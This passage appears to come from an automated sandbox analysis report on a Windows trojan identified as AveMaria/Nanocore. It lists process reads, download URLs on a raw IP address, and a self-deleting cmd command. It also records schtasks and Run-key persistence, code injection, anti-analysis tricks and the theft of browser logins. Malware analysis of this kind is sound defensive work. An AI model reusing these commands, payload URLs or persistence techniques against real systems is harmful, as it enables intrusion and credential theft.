  743. "self_read": "process: wscript.exe, pid: 2340, offset: 0x00000000, length: 0x00000040"
  744.  
  745.  
  746. "self_read": "process: wscript.exe, pid: 2340, offset: 0x000000f0, length: 0x00000018"
  747.  
  748.  
  749. "self_read": "process: wscript.exe, pid: 2340, offset: 0x000001e8, length: 0x00000078"
  750.  
  751.  
  752. "self_read": "process: wscript.exe, pid: 2340, offset: 0x00018000, length: 0x00000020"
  753.  
  754.  
  755. "self_read": "process: wscript.exe, pid: 2340, offset: 0x00018058, length: 0x00000018"
  756.  
  757.  
  758. "self_read": "process: wscript.exe, pid: 2340, offset: 0x000181a8, length: 0x00000018"
  759.  
  760.  
  761. "self_read": "process: wscript.exe, pid: 2340, offset: 0x00018470, length: 0x00000010"
  762.  
  763.  
  764. "self_read": "process: wscript.exe, pid: 2340, offset: 0x00018640, length: 0x00000012"
  765.  
  766.  
  767. "self_read": "process: qDABnKekr.exe, pid: 4032, offset: 0x00000000, length: 0x000aba00"
  768.  
  769.  
  770. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00000000, length: 0x00000007"
  771.  
  772.  
  773. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00000000, length: 0x00002000"
  774.  
  775.  
  776. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00000007, length: 0x0016356a"
  777.  
  778.  
  779. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00001ff0, length: 0x00002000"
  780.  
  781.  
  782. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00003fe0, length: 0x00002000"
  783.  
  784.  
  785. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00005fd0, length: 0x00002000"
  786.  
  787.  
  788. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00007fc0, length: 0x00002000"
  789.  
  790.  
  791. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00009fb0, length: 0x00002000"
  792.  
  793.  
  794. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0000bfa0, length: 0x00002000"
  795.  
  796.  
  797. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0000df90, length: 0x00002000"
  798.  
  799.  
  800. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0000ff80, length: 0x00002000"
  801.  
  802.  
  803. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00011f70, length: 0x00002000"
  804.  
  805.  
  806. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00013f60, length: 0x00002000"
  807.  
  808.  
  809. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00015f50, length: 0x00002000"
  810.  
  811.  
  812. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00017f40, length: 0x00002000"
  813.  
  814.  
  815. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00019f30, length: 0x00002000"
  816.  
  817.  
  818. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0001bf20, length: 0x00002000"
  819.  
  820.  
  821. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0001df10, length: 0x00002000"
  822.  
  823.  
  824. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0001ff00, length: 0x00002000"
  825.  
  826.  
  827. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00021ef0, length: 0x00002000"
  828.  
  829.  
  830. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00023ee0, length: 0x00002000"
  831.  
  832.  
  833. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00025ed0, length: 0x00002000"
  834.  
  835.  
  836. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00027ec0, length: 0x00002000"
  837.  
  838.  
  839. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00029eb0, length: 0x00002000"
  840.  
  841.  
  842. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0002bea0, length: 0x00002000"
  843.  
  844.  
  845. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0002de90, length: 0x00002000"
  846.  
  847.  
  848. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0002fe80, length: 0x00002000"
  849.  
  850.  
  851. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00031e70, length: 0x00002000"
  852.  
  853.  
  854. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00033e60, length: 0x00002000"
  855.  
  856.  
  857. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00035e50, length: 0x00002000"
  858.  
  859.  
  860. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00037e40, length: 0x00002000"
  861.  
  862.  
  863. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00039e30, length: 0x00002000"
  864.  
  865.  
  866. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0003be20, length: 0x00002000"
  867.  
  868.  
  869. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0003de10, length: 0x00002000"
  870.  
  871.  
  872. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0003fe00, length: 0x00002000"
  873.  
  874.  
  875. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00041df0, length: 0x00002000"
  876.  
  877.  
  878. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00043de0, length: 0x00002000"
  879.  
  880.  
  881. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00045dd0, length: 0x00002000"
  882.  
  883.  
  884. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00047dc0, length: 0x00002000"
  885.  
  886.  
  887. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00049db0, length: 0x00002000"
  888.  
  889.  
  890. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0004bda0, length: 0x00002000"
  891.  
  892.  
  893. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0004dd90, length: 0x00002000"
  894.  
  895.  
  896. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0004fd80, length: 0x00002000"
  897.  
  898.  
  899. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00050a00, length: 0x00000031"
  900.  
  901.  
  902. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00050a19, length: 0x00001bba"
  903.  
  904.  
  905. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x000e9c02, length: 0x0000002c"
  906.  
  907.  
  908. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x000ff9c4, length: 0x00000026"
  909.  
  910.  
  911. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x000ffa3d, length: 0x0000002a"
  912.  
  913.  
  914. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015d85b, length: 0x00000028"
  915.  
  916.  
  917. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015da50, length: 0x00000028"
  918.  
  919.  
  920. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015dc28, length: 0x00000028"
  921.  
  922.  
  923. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015de57, length: 0x00000028"
  924.  
  925.  
  926. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015e028, length: 0x00000028"
  927.  
  928.  
  929. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015e208, length: 0x00000028"
  930.  
  931.  
  932. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015e40e, length: 0x00000027"
  933.  
  934.  
  935. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015e5de, length: 0x00000028"
  936.  
  937.  
  938. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015e7dd, length: 0x00000028"
  939.  
  940.  
  941. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015e9d3, length: 0x00000028"
  942.  
  943.  
  944. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015ebd3, length: 0x00000028"
  945.  
  946.  
  947. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015ed9e, length: 0x00000028"
  948.  
  949.  
  950. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015ef6f, length: 0x00000028"
  951.  
  952.  
  953. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015f149, length: 0x00000029"
  954.  
  955.  
  956. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015f326, length: 0x00000028"
  957.  
  958.  
  959. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015f502, length: 0x00000027"
  960.  
  961.  
  962. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015f706, length: 0x00000028"
  963.  
  964.  
  965. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015f90a, length: 0x00000028"
  966.  
  967.  
  968. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015fae7, length: 0x00000028"
  969.  
  970.  
  971. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015fd14, length: 0x00000028"
  972.  
  973.  
  974. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015fef8, length: 0x00000028"
  975.  
  976.  
  977. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001600eb, length: 0x00000028"
  978.  
  979.  
  980. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001602ff, length: 0x00000028"
  981.  
  982.  
  983. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001604ed, length: 0x00000028"
  984.  
  985.  
  986. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001606b5, length: 0x00000027"
  987.  
  988.  
  989. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001608b2, length: 0x00000028"
  990.  
  991.  
  992. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00160a9c, length: 0x00000029"
  993.  
  994.  
  995. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00160c77, length: 0x00000028"
  996.  
  997.  
  998. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00160eaa, length: 0x00000028"
  999.  
  1000.  
  1001. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001610b3, length: 0x00000028"
  1002.  
  1003.  
  1004. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001612a2, length: 0x00000029"
  1005.  
  1006.  
  1007. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00161474, length: 0x00000028"
  1008.  
  1009.  
  1010. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00161643, length: 0x00000028"
  1011.  
  1012.  
  1013. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0016180b, length: 0x00000028"
  1014.  
  1015.  
  1016. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00161a04, length: 0x00000028"
  1017.  
  1018.  
  1019. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00161c14, length: 0x00000028"
  1020.  
  1021.  
  1022. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00161dde, length: 0x00000028"
  1023.  
  1024.  
  1025. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00161fdc, length: 0x00000050"
  1026.  
  1027.  
  1028. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00162216, length: 0x00000028"
  1029.  
  1030.  
  1031. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001623e8, length: 0x00000028"
  1032.  
  1033.  
  1034. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001625d1, length: 0x00000028"
  1035.  
  1036.  
  1037. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0016279f, length: 0x00000028"
  1038.  
  1039.  
  1040. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001629b1, length: 0x00000028"
  1041.  
  1042.  
  1043. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00162b8a, length: 0x00000028"
  1044.  
  1045.  
  1046. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00162d78, length: 0x00000028"
  1047.  
  1048.  
  1049. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00162f4f, length: 0x00000028"
  1050.  
  1051.  
  1052. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00163126, length: 0x00000028"
  1053.  
  1054.  
  1055. "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001632fd, length: 0x0000001b"
  1056.  
  1057.  
  1058. "self_read": "process: wscript.exe, pid: 1656, offset: 0x00000000, length: 0x00000040"
  1059.  
  1060.  
  1061. "self_read": "process: wscript.exe, pid: 1656, offset: 0x000000f0, length: 0x00000018"
  1062.  
  1063.  
  1064. "self_read": "process: wscript.exe, pid: 1656, offset: 0x000001e8, length: 0x00000078"
  1065.  
  1066.  
  1067. "self_read": "process: wscript.exe, pid: 1656, offset: 0x00018000, length: 0x00000020"
  1068.  
  1069.  
  1070. "self_read": "process: wscript.exe, pid: 1656, offset: 0x00018058, length: 0x00000018"
  1071.  
  1072.  
  1073. "self_read": "process: wscript.exe, pid: 1656, offset: 0x000181a8, length: 0x00000018"
  1074.  
  1075.  
  1076. "self_read": "process: wscript.exe, pid: 1656, offset: 0x00018470, length: 0x00000010"
  1077.  
  1078.  
  1079. "self_read": "process: wscript.exe, pid: 1656, offset: 0x00018640, length: 0x00000012"
  1080.  
  1081.  
  1082.  
  1083.  
  1084. "Description": "A process created a hidden window",
  1085. "Details":
  1086.  
  1087. "Process": "images.exe -> C:\\Windows\\System32\\cmd.exe"
  1088.  
  1089.  
  1090. "Process": "images.exe -> cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q \"C:\\ProgramData\\images.exe\""
  1091.  
  1092.  
  1093. "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
  1094.  
  1095.  
  1096. "Process": "images.exe -> C:\\Windows\\System32\\cmd.exe"
  1097.  
  1098.  
  1099. "Process": "images.exe -> cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q \"C:\\ProgramData\\images.exe\""
  1100.  
  1101.  
  1102. "Process": "RegSvcs.exe -> \"schtasks.exe\" /create /f /tn \"DSL Subsystem\" /xml \"C:\\Users\\user\\AppData\\Local\\Temp\\tmp6BE8.tmp\""
  1103.  
  1104.  
  1105. "Process": "RegSvcs.exe -> \"schtasks.exe\" /create /f /tn \"DSL Subsystem Task\" /xml \"C:\\Users\\user\\AppData\\Local\\Temp\\tmp953B.tmp\""
  1106.  
  1107.  
  1108. "Process": "qDABnKekr.exe -> C:\\Windows\\System32\\cmd.exe"
  1109.  
  1110.  
  1111. "Process": "qDABnKekr.exe -> C:\\Windows\\System32\\cmd.exe"
  1112.  
  1113.  
  1114.  
  1115.  
  1116. "Description": "Drops a binary and executes it",
  1117. "Details":
  1118.  
  1119. "binary": "C:\\ProgramData\\images.exe"
  1120.  
  1121.  
  1122.  
  1123.  
  1124. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  1125. "Details":
  1126.  
  1127. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  1128.  
  1129.  
  1130. "suspicious_request": "http://185.62.188.169/paso111.exe"
  1131.  
  1132.  
  1133. "suspicious_request": "http://185.62.188.169/turnx.exe"
  1134.  
  1135.  
  1136.  
  1137.  
  1138. "Description": "Performs some HTTP requests",
  1139. "Details":
  1140.  
  1141. "url": "http://185.62.188.169/paso111.exe"
  1142.  
  1143.  
  1144. "url": "http://185.62.188.169/turnx.exe"
  1145.  
  1146.  
  1147.  
  1148.  
  1149. "Description": "The binary likely contains encrypted or compressed data.",
  1150. "Details":
  1151.  
  1152. "section": "name: UPX1, entropy: 7.89, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x000aae00, virtual_size: 0x000ab000"
  1153.  
  1154.  
  1155.  
  1156.  
  1157. "Description": "The executable is compressed using UPX",
  1158. "Details":
  1159.  
  1160. "section": "name: UPX0, entropy: 0.00, characteristics: IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x001ae000"
  1161.  
  1162.  
  1163.  
  1164.  
  1165. "Description": "Attempts to remove evidence of file being downloaded from the Internet",
  1166. "Details":
  1167.  
  1168. "file": "C:\\ProgramData\\images.exe:Zone.Identifier"
  1169.  
  1170.  
  1171.  
  1172.  
  1173. "Description": "Code injection with CreateRemoteThread in a remote process",
  1174. "Details":
  1175.  
  1176. "Injection": "images.exe(2476) -> cmd.exe(2752)"
  1177.  
  1178.  
  1179.  
  1180.  
  1181. "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
  1182. "Details":
  1183.  
  1184. "Process": "svchost.exe (2500)"
  1185.  
  1186.  
  1187.  
  1188.  
  1189. "Description": "Executed a process and injected code into it, probably while unpacking",
  1190. "Details":
  1191.  
  1192. "Injection": "etx.exe(2868) -> RegSvcs.exe(2912)"
  1193.  
  1194.  
  1195.  
  1196.  
  1197. "Description": "Attempts to stop active services",
  1198. "Details":
  1199.  
  1200. "servicename": "UmRdpService"
  1201.  
  1202.  
  1203.  
  1204.  
  1205. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  1206. "Details":
  1207.  
  1208. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 9895699 times"
  1209.  
  1210.  
  1211.  
  1212.  
  1213. "Description": "Steals private information from local Internet browsers",
  1214. "Details":
  1215.  
  1216. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  1217.  
  1218.  
  1219.  
  1220.  
  1221. "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
  1222. "Details":
  1223.  
  1224. "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
  1225.  
  1226.  
  1227.  
  1228.  
  1229. "Description": "Installs itself for autorun at Windows startup",
  1230. "Details":
  1231.  
  1232. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images"
  1233.  
  1234.  
  1235. "data": "C:\\ProgramData\\images.exe"
  1236.  
  1237.  
  1238. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate"
  1239.  
  1240.  
  1241. "data": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\POR_IW~1"
  1242.  
  1243.  
  1244. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\DSL Subsystem"
  1245.  
  1246.  
  1247. "data": "C:\\Program Files (x86)\\DSL Subsystem\\dslss.exe"
  1248.  
  1249.  
  1250. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll"
  1251.  
  1252.  
  1253. "data": "%ProgramFiles%\\Microsoft DN1\\sqlmap.dll"
  1254.  
  1255.  
  1256.  
  1257.  
  1258. "Description": "Exhibits behavior characteristic of Nanocore RAT",
  1259. "Details":
  1260.  
  1261.  
  1262. "Description": "Creates a hidden or system file",
  1263. "Details":
  1264.  
  1265. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF5286d4.TMP"
  1266.  
  1267.  
  1268. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe"
  1269.  
  1270.  
  1271. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\aej.mp3"
  1272.  
  1273.  
  1274. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\aio.icm"
  1275.  
  1276.  
  1277. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\arr.jpg"
  1278.  
  1279.  
  1280. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\bwi.icm"
  1281.  
  1282.  
  1283. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\car.bmp"
  1284.  
  1285.  
  1286. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ctx.mp3"
  1287.  
  1288.  
  1289. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\dkr.mp4"
  1290.  
  1291.  
  1292. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\dpu.ico"
  1293.  
  1294.  
  1295. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\dti.mp4"
  1296.  
  1297.  
  1298. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\epu.ppt"
  1299.  
  1300.  
  1301. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\exw.bmp"
  1302.  
  1303.  
  1304. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\fvg.ico"
  1305.  
  1306.  
  1307. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\gst.icm"
  1308.  
  1309.  
  1310. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\gvf.docx"
  1311.  
  1312.  
  1313. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\hqc.vbs"
  1314.  
  1315.  
  1316. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ikl.bmp"
  1317.  
  1318.  
  1319. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\jao.mp3"
  1320.  
  1321.  
  1322. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\jcp.mp3"
  1323.  
  1324.  
  1325. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\jig.dat"
  1326.  
  1327.  
  1328. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\kai.ppt"
  1329.  
  1330.  
  1331. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\kgg.icm"
  1332.  
  1333.  
  1334. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\kie.mp3"
  1335.  
  1336.  
  1337. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\lis.mp3"
  1338.  
  1339.  
  1340. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\lua.mp3"
  1341.  
  1342.  
  1343. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\mfs.docx"
  1344.  
  1345.  
  1346. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\mhf.jpg"
  1347.  
  1348.  
  1349. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\mnm.jpg"
  1350.  
  1351.  
  1352. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\msw.dat"
  1353.  
  1354.  
  1355. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\nfb.dat"
  1356.  
  1357.  
  1358. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\obx.jpg"
  1359.  
  1360.  
  1361. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\osx.ico"
  1362.  
  1363.  
  1364. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\pao.mp4"
  1365.  
  1366.  
  1367. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\pii.ppt"
  1368.  
  1369.  
  1370. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\por=iwi"
  1371.  
  1372.  
  1373. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\qjd.xl"
  1374.  
  1375.  
  1376. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\qsh.jpg"
  1377.  
  1378.  
  1379. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ran.docx"
  1380.  
  1381.  
  1382. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\rcs.icm"
  1383.  
  1384.  
  1385. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\rvm.icm"
  1386.  
  1387.  
  1388. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\sbq.bmp"
  1389.  
  1390.  
  1391. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\skw.icm"
  1392.  
  1393.  
  1394. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\tjx.ico"
  1395.  
  1396.  
  1397. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\tlt.txt"
  1398.  
  1399.  
  1400. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ttd.jpg"
  1401.  
  1402.  
  1403. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uel.xl"
  1404.  
  1405.  
  1406. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ufp.ppt"
  1407.  
  1408.  
  1409. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uhp.jpg"
  1410.  
  1411.  
  1412. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uph.jpg"
  1413.  
  1414.  
  1415. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uuq.bmp"
  1416.  
  1417.  
  1418. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\vki.dat"
  1419.  
  1420.  
  1421. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\wwk.xl"
  1422.  
  1423.  
  1424. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF53f6a1.TMP"
  1425.  
  1426.  
  1427. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484"
  1428.  
  1429.  
  1430. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF54169c.TMP"
  1431.  
  1432.  
  1433. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF549419.TMP"
  1434.  
  1435.  
  1436. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF5511b5.TMP"
  1437.  
  1438.  
  1439.  
  1440.  
  1441. "Description": "File has been identified by 22 Antiviruses on VirusTotal as malicious",
  1442. "Details":
  1443.  
  1444. "McAfee": "RDN/Generic.tfr"
  1445.  
  1446.  
  1447. "K7AntiVirus": "Trojan ( 005553ee1 )"
  1448.  
  1449.  
  1450. "K7GW": "Trojan ( 005553ee1 )"
  1451.  
  1452.  
  1453. "Cybereason": "malicious.2eb36b"
  1454.  
  1455.  
  1456. "Symantec": "ML.Attribute.HighConfidence"
  1457.  
  1458.  
  1459. "APEX": "Malicious"
  1460.  
  1461.  
  1462. "Paloalto": "generic.ml"
  1463.  
  1464.  
  1465. "Kaspersky": "Trojan-Spy.Win32.AveMaria.bpy"
  1466.  
  1467.  
  1468. "McAfee-GW-Edition": "BehavesLike.Win32.Comame.jc"
  1469.  
  1470.  
  1471. "Trapmine": "suspicious.low.ml.score"
  1472.  
  1473.  
  1474. "FireEye": "Generic.mg.b74568d64360d5a2"
  1475.  
  1476.  
  1477. "SentinelOne": "DFI - Suspicious PE"
  1478.  
  1479.  
  1480. "MaxSecure": "Trojan.Malware.300983.susgen"
  1481.  
  1482.  
  1483. "Antiy-AVL": "TrojanSpy/Win32.AveMaria"
  1484.  
  1485.  
  1486. "Microsoft": "Trojan:Win32/Casur.A!cl"
  1487.  
  1488.  
  1489. "Endgame": "malicious (moderate confidence)"
  1490.  
  1491.  
  1492. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  1493.  
  1494.  
  1495. "Acronis": "suspicious"
  1496.  
  1497.  
  1498. "ESET-NOD32": "a variant of Win32/Kryptik.GVIY"
  1499.  
  1500.  
  1501. "eGambit": "Unsafe.AI_Score_93%"
  1502.  
  1503.  
  1504. "CrowdStrike": "win/malicious_confidence_90% (W)"
  1505.  
  1506.  
  1507. "Qihoo-360": "Win32/Trojan.Spy.6ce"
  1508.  
  1509.  
  1510.  
  1511.  
  1512. "Description": "Attempts to modify proxy settings",
  1513. "Details":
  1514.  
  1515.  
  1516. "Description": "Creates a copy of itself",
  1517. "Details":
  1518.  
  1519. "copy": "C:\\ProgramData\\images.exe"
  1520.  
  1521.  
  1522.  
  1523.  
  1524. "Description": "Harvests information related to installed mail clients",
  1525. "Details":
  1526.  
  1527. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676"
  1528.  
  1529.  
  1530. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  1531.  
  1532.  
